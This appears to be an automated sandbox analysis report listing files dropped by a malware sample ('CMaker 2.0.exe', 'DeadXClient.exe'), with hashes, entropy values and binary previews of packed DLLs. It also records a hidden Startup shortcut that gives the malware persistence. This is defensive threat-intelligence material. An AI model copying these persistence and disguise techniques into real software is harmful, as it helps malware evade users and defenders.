                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..m...m...m...d.@.....2..o...2..|...2..e...2..i....2..o...m...L......|...1......m.......1..l...1..l...Richm...........................PE..d....o_f.........." ...'.. ...... O..)o..0O..................................Po...........`.........................................(Eo.p....@o.(............`j.DO...........Eo.$............................5o.(....6o.@...........................................UPX0..... O.............................UPX1...... ..0O... .................@...UPX2.........@o....... .............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI48002\libcrypto-3.dll

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1629464
                                                                                                                                                                                Entropy (8bit):7.952620301087112
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:49152:kMyDwbv70aKbP1zkLO5YHLA1CPwDvt3uFlDCZ:owbv77KbPaqYHLA1CPwDvt3uFlDCZ
                                                                                                                                                                                MD5:F3FDBBD6C6EA0ABE779151AE92C25321
                                                                                                                                                                                SHA1:0E62E32666BA5F041B5369B36470295A1916CB4E
                                                                                                                                                                                SHA-256:9000E335744818665B87A16A71DA5B622B5052B5341F1D6CE08FF8346D2BF3E4
                                                                                                                                                                                SHA-512:E8A363042A05868ACC693B5D313F52FFC95B8F6B764A77FF477B0CE2288787DD275478DDBE33D6DBD87636BA9FF0243D2E447A161E2F9CC2F3DBA0746F219E4E
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d...x..e.........." ...#. .......`9.0{O..p9.................................. R...........`......................................... .O......O.h.....O.......K.\.............R.......................................O.@...........................................UPX0.....`9.............................UPX1..... ...p9.....................@....rsrc.........O.....................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI48002\libffi-8.dll

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):29968
                                                                                                                                                                                Entropy (8bit):7.677818197322094
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:Tp/6aepjG56w24Up3p45YiSyvkIPxWEqG:5A154spK7SytPxF
                                                                                                                                                                                MD5:0D1C6B92D091CEF3142E32AC4E0CC12E
                                                                                                                                                                                SHA1:440DAD5AF38035CB0984A973E1F266DEFF2BD7FC
                                                                                                                                                                                SHA-256:11EE9C7FB70C3756C0392843245935517171B95CC5BA0D696B2C1742C8D46FB6
                                                                                                                                                                                SHA-512:5D514ECAB93941E83C008F0E9749F99E330949580884BF4850B11CAC08FE1AC4AC50033E8888045FE4A9D8B4D2E3EA667B39BE18F77266D00F8D7D6797260233
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI48002\libssl-3.dll

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):229144
                                                                                                                                                                                Entropy (8bit):7.930038440560372
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:GFfmvsqWLSCMT+MyN6Qp2oZqpN+/fvrqknqbf6CjaBGkfPkZAK1ck2kBVfLwOmFd:GFevsT9JN+vyH1nqLr3CPrYBBRcd
                                                                                                                                                                                MD5:F9BC28708C1628EF647A17D77C4F5F1A
                                                                                                                                                                                SHA1:032A8576487AD26F04D31628F833EF9534942DA6
                                                                                                                                                                                SHA-256:49BA508DC66C46B9E904BB5FE50CF924465EFF803A9F1E4260E752B0231EFCC1
                                                                                                                                                                                SHA-512:E33FD00BCF73AAB8BCE260EDA995A1513930B832EA881C5A8CE1A151BE3576F3369AC0B794FDD93806157BB9F4FE4EBA38A25F4FDC512A6F3640647B8B447387
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T..T..T..].3.Z....V......V....X....\....P....W..T..I....e....U.._.U....U..RichT..........PE..d......e.........." ...#.....P...p...r....................................................`............................................,C......8............ ..pM...................................................~..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI48002\python3.dll

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):67352
                                                                                                                                                                                Entropy (8bit):6.1462717896521335
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:lGw/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJa:r/5k8cnzeJd9IVL0v7SyJwx/
                                                                                                                                                                                MD5:D8BA00C1D9FCC7C0ABBFFB5C214DA647
                                                                                                                                                                                SHA1:5FA9D5700B42A83BFCC125D1C45E0111B9D62035
                                                                                                                                                                                SHA-256:E45452EFA356DB874F2E5FF08C9CC0FE22528609E5D341F8FB67BA48885AB77D
                                                                                                                                                                                SHA-512:DF1B714494856F618A742791EEFBF470B2EEE07B51D983256E4386EA7D48DA5C7B1E896F222EA55A748C9413203886CDE3A65EF9E7EA069014FA626F81D79CD3
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C..."e.."e.."e.0_m.."e.0_e.."e.0_..."e.0_g.."e.Rich."e.................PE..d......e.........." ...#.................................................................`.........................................`...P................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI48002\python311.dll

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1705240
                                                                                                                                                                                Entropy (8bit):7.993600008484676
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:24576:CJY99sOZi/8N8C1CSIJyR4ZRE1Rqq/uQivcHe2Bg5Cmek5CP7uP6zohpLGLZFkh2:9jZiEN8p6ivZUHe2BgcpP7uaor6
                                                                                                                                                                                MD5:AFFA456007F359E9F8C5D2931D966CB9
                                                                                                                                                                                SHA1:9B06D6CB7D7F1A7C2FA9E7F62D339B9F2813E80F
                                                                                                                                                                                SHA-256:4BAB2E402A02C8B2B0542246D9EF54027A739121B4B0760F08CD2E7C643ED866
                                                                                                                                                                                SHA-512:7C357F43DD272E1D595CCDE87C13FD2CDF4123B20AF6855576BFBA15AFD814A95886CEBBE96BB7781B916F9DB3C3EE02D381036DDBF62095DE3EE43A7F94D156
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... ..qN.qN.qN.$.O.qN.$...qN.$.K.qN.$.J.qN.$.M.qN....qN...O.qN.qO..pN.B.C.]qN.B.N.qN.B...qN.B.L.qN.Rich.qN.........PE..d......e.........." ...#..........D...]...D...................................^...........`.........................................H.].......].......].......V../..........(.^.......................................].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI48002\select.pyd

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):26392
                                                                                                                                                                                Entropy (8bit):7.44233047444268
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:kUAW1guHrh0h1d4NZa7gJXZjNIVQG86lHQIYiSy1pCQfwug+AM+o/8E9VF0NyciC:kjW1JVpJjNIVQG8S5YiSyv3g+AMxkEdC
                                                                                                                                                                                MD5:A74E10B7401EA044A8983D01012F3103
                                                                                                                                                                                SHA1:CDD0AFA6AE1DCEBC9CCFEC17E23C6770A9ABFB8F
                                                                                                                                                                                SHA-256:78A4B12D7DA7E67B1DC90646B269C3E8DFEA5DC24E5EEF4787FFFD4325FE39D8
                                                                                                                                                                                SHA-512:A080050B5D966303D2A27CAFCA8CBF83777329A54CA00BBB16EB547EEF4262C9FDF7C828CADB02E952AEB631EC560D1DCE3CF91F387A96DE9E82037F1C3AC47B
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t.q|'.q|'.q|'...'.q|'q.}&.q|'q.y&.q|'q.x&.q|'q..&.q|'..}&.q|'.q}'.q|'..}&.q|'..q&.q|'..|&.q|'...'.q|'..~&.q|'Rich.q|'........PE..d......e.........." ...#.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI48002\unicodedata.pyd

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):302872
                                                                                                                                                                                Entropy (8bit):7.986782854548308
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6144:yk/Qvs7yfQJYx4x9UVqHDMDNCStEQc5YmDp9KiQ/y:ykUfQJbUV2MhCwEQc5Np9zQ6
                                                                                                                                                                                MD5:660EF38D6DE71EB7E06C555B38C675B5
                                                                                                                                                                                SHA1:944EC04D9B67D3F25D3FB448973C7AD180222BE3
                                                                                                                                                                                SHA-256:FD746987AB1EA02B6568091040E8C5204FB599288977F8077A7B9ECEFDC5EDB4
                                                                                                                                                                                SHA-512:26AC7D56E4FB02E43E049C9055979FC6E0E16FAB8F08F619233E12B278F300FAA5FFABAC1D9B71091571A89CDF9ACFEB3478508FBA96EF2E647327215BE6E9D7
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4m..4m..4m..=...2m......6m......9m......<m......7m......7m......6m..4m..em......5m......5m....j.5m......5m..Rich4m..................PE..d......e.........." ...#.`.......@.......P................................................`.............................................X....................P..0.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...^..................@....rsrc................b..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnk

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\Public\DeadXClient.exe
                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Oct 22 16:37:13 2024, mtime=Tue Oct 22 16:37:13 2024, atime=Tue Oct 22 16:37:13 2024, length=35840, window=hide
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1003
                                                                                                                                                                                Entropy (8bit):4.620356106842223
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:8p+WWLFUM6ICzuCHqXDvhnX2FACmUqLljlUMvCjASG9KbgkNvqWzYVDSVlk44t2h:8prOvL2AXqnvdYgnqygm
                                                                                                                                                                                MD5:0D427E1DF618EE79795A080617AEC84A
                                                                                                                                                                                SHA1:B47580920C7B9A3A3617D3559D719EEF3F4844BC
                                                                                                                                                                                SHA-256:AAE2D5F12372094ED50062558FFB1C5E1CE9692B9058F71718A2E0271C8468DF
                                                                                                                                                                                SHA-512:7BC6C09FF36FFFB46EBA21122F8F924D837E76DF9C9639913CB6E44F7B49486785B104688D028E989657799A3BE5B0A6C9AB8C89859CE2BFDB26DC4E175E8E8A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:L..................F.... ........$.......$.......$...............................P.O. .:i.....+00.../C:\...................x.1.....EW.2..Users.d......OwHVY......................:.....6.d.U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1.....VY....Public..f......O.IVY......+...............<......<W.P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....l.2.....VY.. .DEADSV~1.EXE..P......VY..VY......<.....................j.M.D.e.a.d.s.v.c.h.o.s.t...e.x.e.......N...............-.......M...........^.P......C:\Users\Public\Deadsvchost.exe........\.....\.....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.D.e.a.d.s.v.c.h.o.s.t...e.x.e.............!............v..*.cM.jVD.Es.!...`.......X.......506407...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?.............

                                                                                                                                                                                C:\Windows\INF\WmiApRpl\WmiApRpl.h

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3444
                                                                                                                                                                                Entropy (8bit):5.011954215267298
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                                                                                                                                                MD5:B133A676D139032A27DE3D9619E70091
                                                                                                                                                                                SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                                                                                                                                                SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                                                                                                                                                SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                                                                                                                                                                                C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:@...e...........................................................

                                                                                                                                                                                C:\Windows\System32\perfc009.dat

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):129304
                                                                                                                                                                                Entropy (8bit):3.4053644175972018
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:X1i4nfw8ld9+mRDaUR28oV7TYfXLi7NwrgSwNu56FRto:XBnfw8ld9+mRDaUR28oV7TY+7S0bS
                                                                                                                                                                                MD5:9AF42BB696EFC1BBDD22EE27988B26DE
                                                                                                                                                                                SHA1:EC894667C90179CB8EE7EA08B39974EB30984877
                                                                                                                                                                                SHA-256:06F0E20AA133D253C6F1551A7DEE48A9BDE83FE54DBA2EEF81EC7A20B5D7862F
                                                                                                                                                                                SHA-512:39A07E7F021015D49C57672B92A39ABBEA59F33E025792FE83F73E5AF6DC31F1DB0F85D58CDC2C10E8ED50026B6A743207E4587EBED75A0B7C7625EABEB333DC
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1...1.8.4.7...2...S.y.s.t.e.m...4...M.e.m.o.r.y...6...%. .P.r.o.c.e.s.s.o.r. .T.i.m.e...1.0...F.i.l.e. .R.e.a.d. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.2...F.i.l.e. .W.r.i.t.e. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.4...F.i.l.e. .C.o.n.t.r.o.l. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.6...F.i.l.e. .R.e.a.d. .B.y.t.e.s./.s.e.c...1.8...F.i.l.e. .W.r.i.t.e. .B.y.t.e.s./.s.e.c...2.0...F.i.l.e. .C.o.n.t.r.o.l. .B.y.t.e.s./.s.e.c...2.4...A.v.a.i.l.a.b.l.e. .B.y.t.e.s...2.6...C.o.m.m.i.t.t.e.d. .B.y.t.e.s...2.8...P.a.g.e. .F.a.u.l.t.s./.s.e.c...3.0...C.o.m.m.i.t. .L.i.m.i.t...3.2...W.r.i.t.e. .C.o.p.i.e.s./.s.e.c...3.4...T.r.a.n.s.i.t.i.o.n. .F.a.u.l.t.s./.s.e.c...3.6...C.a.c.h.e. .F.a.u.l.t.s./.s.e.c...3.8...D.e.m.a.n.d. .Z.e.r.o. .F.a.u.l.t.s./.s.e.c...4.0...P.a.g.e.s./.s.e.c...4.2...P.a.g.e. .R.e.a.d.s./.s.e.c...4.4...P.r.o.c.e.s.s.o.r. .Q.u.e.u.e. .L.e.n.g.t.h...4.6...T.h.r.e.a.d. .S.t.a.t.e...4.8...P.a.g.e.s. .O.u.t.p.u.t./.s.e.c...5.0...P.a.g.e. .W.r.i.t.e.s./.s.e.c...5.2...B.r.o.w.s.e.r...5.4...A.n.n.o.u.

                                                                                                                                                                                C:\Windows\System32\perfh009.dat

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):697270
                                                                                                                                                                                Entropy (8bit):3.2735341717803963
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:NUdGNuowE4j0PrRZnpETMDZ8M6d0PHHx643/A5BK9YXdhPHlVziwC4ALWI1dnmRj:78M6d0w+WB62
                                                                                                                                                                                MD5:DD78C325FDB07A0714C016FD6FE034CA
                                                                                                                                                                                SHA1:A7758E36212A446040010A0A5A34DBCF2B822394
                                                                                                                                                                                SHA-256:E146AD67B5E4CB731007F1AB70191C5AE0BA835E25E10F1D4BB61C7AA8459B42
                                                                                                                                                                                SHA-512:EDDC0D47A747CB95EFF9B1721D12C53077A4C6F7E1395647AF6B8F83926B627EA67B477F4B0FD5ADFE364D8E852C0FAA55665E104D9B6E91391A9F0DC5D7622C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:3...T.h.e. .S.y.s.t.e.m. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .a.p.p.l.y. .t.o. .m.o.r.e. .t.h.a.n. .o.n.e. .i.n.s.t.a.n.c.e. .o.f. .a. .c.o.m.p.o.n.e.n.t. .p.r.o.c.e.s.s.o.r.s. .o.n. .t.h.e. .c.o.m.p.u.t.e.r.....5...T.h.e. .M.e.m.o.r.y. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. . .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .d.e.s.c.r.i.b.e. .t.h.e. .b.e.h.a.v.i.o.r. .o.f. .p.h.y.s.i.c.a.l. .a.n.d. .v.i.r.t.u.a.l. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .P.h.y.s.i.c.a.l. .m.e.m.o.r.y. .i.s. .t.h.e. .a.m.o.u.n.t. .o.f. .r.a.n.d.o.m. .a.c.c.e.s.s. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .V.i.r.t.u.a.l. .m.e.m.o.r.y. .c.o.n.s.i.s.t.s. .o.f. .t.h.e. .s.p.a.c.e. .i.n. .p.h.y.s.i.c.a.l. .m.e.m.o.r.y. .a.n.d. .o.n. .d.i.s.k... . .M.a.n.y. .o.f. .t.h.e. .m.e.m.o.r.y. .c.o.u.n.t.e.r.s. .m.o.n.i.t.o.r. .p.a.g.i.n.g.,. .w.h.i.c.h. .i.s. .t.h.e. .m.o.v.e.m.e.n.t. .o.f. .p.a.g.e.s. .o.f. .c.o.d.e. .a.n.d. .d.a.t.a. .b.e.t.

                                                                                                                                                                                C:\Windows\System32\wbem\Performance\WmiApRpl_new.h

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3444
                                                                                                                                                                                Entropy (8bit):5.011954215267298
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                                                                                                                                                MD5:B133A676D139032A27DE3D9619E70091
                                                                                                                                                                                SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                                                                                                                                                SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                                                                                                                                                SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                                                                                                                                                                                C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):48786
                                                                                                                                                                                Entropy (8bit):3.5854495362228453
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                                                                                                                                                                MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                                                                                                                                                                SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                                                                                                                                                                SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                                                                                                                                                                SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Application.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):79168
                                                                                                                                                                                Entropy (8bit):4.1333456683787695
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:DHdIo2S+410HdIo2S+41KdcmbkrP5tH15QaVhL0KXSvPEsghcVrbtHdIo2S+41gC:Dd2dd21c8IPL0KXSvPEs6c1td2M
                                                                                                                                                                                MD5:A540CEA1ADF6472141CBB955D03815A5
                                                                                                                                                                                SHA1:4144C1DC36987CB539F88AA16C4B99C79E582899
                                                                                                                                                                                SHA-256:A1CDEC6BDE7CEE0A664870A9777511DEA83C967A485A635DE9C4EF7726FEFFFB
